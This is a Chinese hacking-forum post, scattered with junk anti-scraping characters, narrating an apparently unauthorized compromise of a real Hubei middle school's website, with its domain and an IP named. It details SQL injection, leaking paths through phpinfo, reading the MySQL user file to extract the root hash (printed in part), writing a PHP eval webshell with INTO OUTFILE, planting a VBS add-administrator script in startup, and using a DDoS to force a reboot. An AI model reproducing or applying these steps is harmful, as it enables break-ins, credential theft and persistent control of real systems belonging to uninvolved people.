找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2641|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
: W* |; n/ j, D" ]6 Q发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!( ^4 T. p/ {6 y7 A5 J+ V9 c" f- B& @
, B" N) y/ x. m. o6 H- z8 W" E

' M. N6 {4 l& m0 D0 Z$ q6 R
3 A3 M0 b4 l8 ~) a常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 / Z' ]4 D+ F! w, V: Y

: I" a0 w! I+ Z$ h- j; N, s/ j3 \那么想可以直接写入shell ,getshell有几个条件:* Q. a; B. }. X3 A  `9 x( ~  j! W
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF& d* |- Y$ ]9 O

+ X2 j+ y6 v( M6 e! S8 |$ X! S试着爆绝对路径:% L1 R% [) r; I" N
1./phpMyAdmin/index.php?lang[]=1  
: r+ X- ~+ e% N. _2 f0 I. S2./phpMyAdmin/phpinfo.php  
3 C. O. J' A" `0 U! t- d3./load_file()  
9 f2 \( e2 u7 z$ K( l4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
7 `0 x. u) [4 P3 R: [6 f5./phpmyadmin/libraries/select_lang.lib.php  " P% P6 J. w; T* f3 d
6./phpmyadmin/libraries/lect_lang.lib.php  , M6 M# R* E$ h" \# d4 l! |6 Y
7./phpmyadmin/libraries/mcrypt.lib.php   
4 r+ m# W+ P! V# R% A: @4 e6 k  m8./phpmyadmin/libraries/export/xls.php  # V/ d. N% k  N  K; H" \

2 |( Z: i% a" S0 e均不行...........................+ @% t7 ]! D- k- s
! F6 p$ r( Z* N1 e
御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
! J& Y. [# I& _& K) h
  ]' U5 h% N$ Z* h6 ~, R( D权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin ' k* L- J; ^% T( g% w7 C: O
1 B: H9 y1 p" F+ q% @# ?
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败+ ^7 L( t! e# A' n  N4 M
) s" S3 k8 f4 X0 }' R
敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........
) w: o2 a3 g3 I9 C, `
% E. Q( g/ |* d9 o0 y( M9 U5 b( K+ [想想root还可以读,读到root密码进phpmyadmin 也可以拿shell   l4 }# p* E  P$ m5 @/ T

. i8 j$ O/ [+ X; t4 ?; `* r6 I6 I% Thttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini 2 g; m/ [) U6 @

$ x3 n0 o; ~/ v) v8 a4 I自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD % ~) C7 _6 D3 R) L9 h; m8 |# T
' N1 K& {# R5 V0 A. `
成功读到root密码:
2 i, a* @* e# ]5 p, N! @: }( }4 O' F: q% x
17---- r(0072)
- Y' m# j+ a2 m18---- o(006f)
- G: B: n$ c+ h19---- o(006f)
! _! J- x# p$ v/ _20---- t(0074)
$ K: [- m- F* D* Q5 {. K21---- *(002a)- e# V/ i' ]' F& v/ F, `0 u2 G! \
22---- 8(0038)
, A+ x, b5 L4 x  T+ }23---- 2(0032)7 k" L* A- [( d, v
24---- E(0045)
3 h8 H  p9 V' Q1 e+ s# J0 Z25---- 1(0031)# \; `( g2 b2 p' M" N" a* j
26---- C(0043)
5 k& q7 K9 X: V27---- 5(0035)- h# H% s2 C8 p# Y. }+ |/ Y
28---- 8(0038)
7 x# K+ p% u( S" W" g+ I& F7 N29---- 2(0032)' y% F0 @, J0 _8 u, p. u3 L
30---- 8(0038)
: p8 i# i" ?6 c4 T- e) W7 a* ^+ g31---- A(0041)& [: @! |0 a% V' x9 h
32---- 9(0039)
3 {" A; g# _/ Y! c2 K2 o/ n33---- B(0042)
& O* ]6 T5 m% F/ X34---- 5(0035)( V+ y* F1 H: ?1 g
35---- 4(0034)/ C" x2 r' R: N% G7 d
36---- 8(0038)
  Y2 a* I$ |1 ~- h' v' p, O37---- 6(0036): m* W( }$ x( {
38---- 4(0034)
& l9 e4 n& {# H! C$ W; i39---- 9(0039)# G& _; W9 B% F# O4 b
40---- 1(0031)* v  Z0 G( G* |* i7 I
41---- 1(0031)( H; W% W: C6 j" J
42---- 5(0035)
) M& S# C/ ?2 ?) A6 u  N43---- 3(0033)2 r$ J& ]5 x$ Q, d
44---- 5(0035)6 C3 b5 n) h% x2 U4 N1 l* i
45---- 9(0039)
& H# t% D. U3 b, _7 {1 b46---- 8(0038)
& k, u: o3 Q  A1 }) n47---- F(0046)
/ l7 S& l$ f8 D48---- F(0046). `( r5 y+ E  ^% m; x
49---- 4(0034)
& h/ h$ n3 @2 o/ w: A50---- F(0046)
- \5 g: [  m' ]) V  `, h51---- 0(0030)
& Y, S# S* F/ v52---- 3(0033)4 G3 o# y: H# T* G. V
53---- 2(0032)" o1 r5 ^) G. j, w( w) `
54---- A(0041)
" X2 a; ^$ A" ~. U, R# f9 Y55---- 4(0034)* }) V% z' T8 J9 q
56---- A(0041)* x8 Q. }2 D" v; Q0 ~
57---- B(0042)
1 ~4 A& t: G8 y: Q. |: \9 `  U58---- *(0044)# B% i" `4 d# `( X0 q$ ^: L
59---- *(0035)
; X4 M9 \# M  ?+ B60---- *(0041)! W8 f0 Y$ J3 c! B3 t2 `; n
61---- *0032)  @7 h0 `, C0 G8 d! F
! L2 O6 G9 P3 [7 E: {
解密后成功登陆phpmyamin/ B/ C8 a( w4 Q0 w0 y8 A
                          
9 g" u/ X% @) }8 e; U6 K
) K$ m8 I- x/ N$ h. `                             - R$ M  j- N9 D7 M. P! E6 v

& a& L& w& V0 ^6 g3 @7 f找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'. y6 i. `8 Y8 r$ B" X2 D

; o* g' W0 g( p9 G7 y成功执行,拿下shell,菜刀连接:* w: g' E! @% M: l* `0 t
8 w# i1 L) Y2 B% `
服务器不支持asp,aspx,php提权无果...................
% y8 e* J/ }2 A7 ^# T5 p: `* C' T  P4 L7 ^. @
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
" F5 \) u; z! A) Y+ A" R: w
服务器上已经有个隐藏帐号了
) o. k+ q' b! |2 ?& Q
别名     administrators
. z  n4 l1 b7 K: c  ^6 R注释     管理员对计算机/域有不受限制的完全访问权
5 e& B' |/ c7 N$ n
成员
5 u" J2 A6 Z4 P% i- p" L) ]1 [% R
-------------------------------------------------------------------------------
4 }( A2 n3 G% Y# U5 \admin
$ o' m. @. ~6 q0 x$ kAdministrator
1 e% C1 A. l+ q5 islipper$
, V! T2 k. C* U- ]sqluser. \6 C5 [5 q; N" n% a
命令成功完成。
9 c9 T4 h( h# R. h- l( I7 Y* D) K" [9 n/ H4 ~& f  f
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。. b' q; X( B: I1 R7 G$ c" e
$ B1 X1 ]& w/ T2 K+ a2 W' m
ddos服务器重启,不然就只能坐等服务器重启了...............................2 e; Z  u' ~# |2 z2 D
5 R8 ?% _9 u4 M
      

8 @! h6 |: c, j6 l: n3 q- M

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表